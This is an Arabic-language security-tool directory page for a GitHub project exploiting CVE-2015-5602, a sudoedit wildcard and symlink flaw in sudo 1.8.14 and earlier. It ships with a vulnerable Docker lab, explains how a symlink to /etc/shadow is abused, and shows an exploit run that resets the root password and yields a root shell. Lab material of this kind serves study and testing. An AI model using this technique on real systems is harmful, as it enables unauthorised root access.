Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
privesc-CVE-2015-5602 — Sudo <= 1.8.14 تصعيد الامتيازات المحلي وحاوية ضعيفة | Kitploit
أدوات/GitHubGitHub/t0kx/privesc-cve-2015-5602
تصعيد الامتيازاتأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليممختبرات وتدريب عملي
GitHubt0kx/privesc-cve-2015-5602

privesc-CVE-2015-5602

Sudo <= 1.8.14 تصعيد الامتيازات المحلي وحاوية ضعيفة

عرض المستودع
15223منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Sudo <=1.8.14 تصعيد الامتيازات المحلية

Sudo (su "do") يسمح لمسؤول النظام بمنح مستخدمين معينين (أو مجموعات من المستخدمين) القدرة على تشغيل بعض (أو كل) الأوامر كجذر مع تسجيل جميع الأوامر والوسائط.

البيئة الضعيفة

لإعداد بيئة ضعيفة لاختبارك، ستحتاج إلى تثبيت Docker، ثم قم بتشغيل الأمر التالي:

root@kitploit:~
docker build -t privesc/cve-2015-5602 .
docker run --rm -it privesc/cve-2015-5602

وسينشئ شيل تفاعلي بصلاحيات مستخدم منخفضة.

الكود الضعيف

تم العثور على الخلل في sudoedit، الذي لا يتحقق من المسار الكامل إذا تم استخدام بدل (wildcard) مرتين (مثل /home/*/*/esc.txt)، مما يسمح لمستخدم ضار باستبدال الملف الحقيقي esc.txt برابط رمزي إلى موقع مختلف (مثل /etc/shadow).

قد يؤدي استغلال هذه المشكلة بنجاح إلى السماح للمهاجم بالتلاعب بالملفات والحصول على صلاحيات root على النظام المضيف من خلال هجمات الروابط الرمزية.

الاستغلال

لاستغلال هذا الهدف، قم بتشغيل:

root@kitploit:~
./exploit.sh

إذا كنت تستخدم هذه الصورة الضعيفة، يمكنك تشغيل:

root@kitploit:~
user@1cc9cd901b07:~$ sudo -l
User user may run the following commands on 1cc9cd901b07:
    (root) NOPASSWD: sudoedit /home/*/*/esc.txt
user@1cc9cd901b07:~$ ./exploit.sh 
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: d03c09dc34c53657aff1f459a86b20ed
[+] Done
user@1cc9cd901b07:~$ su
Password: 
root@1cc9cd901b07:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@1cc9cd901b07:/home/user#

الاعتمادات

تم العثور على هذا الخلل بواسطة Daniel Svartman.

إخلاء مسؤولية

هذا البرنامج أو البرامج السابقة هي لأغراض تعليمية فقط. لا تستخدمها دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (t0kx) غير مسؤول عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي تقدمها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذه البرامج، فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية t0kx.

تنزيل الأداة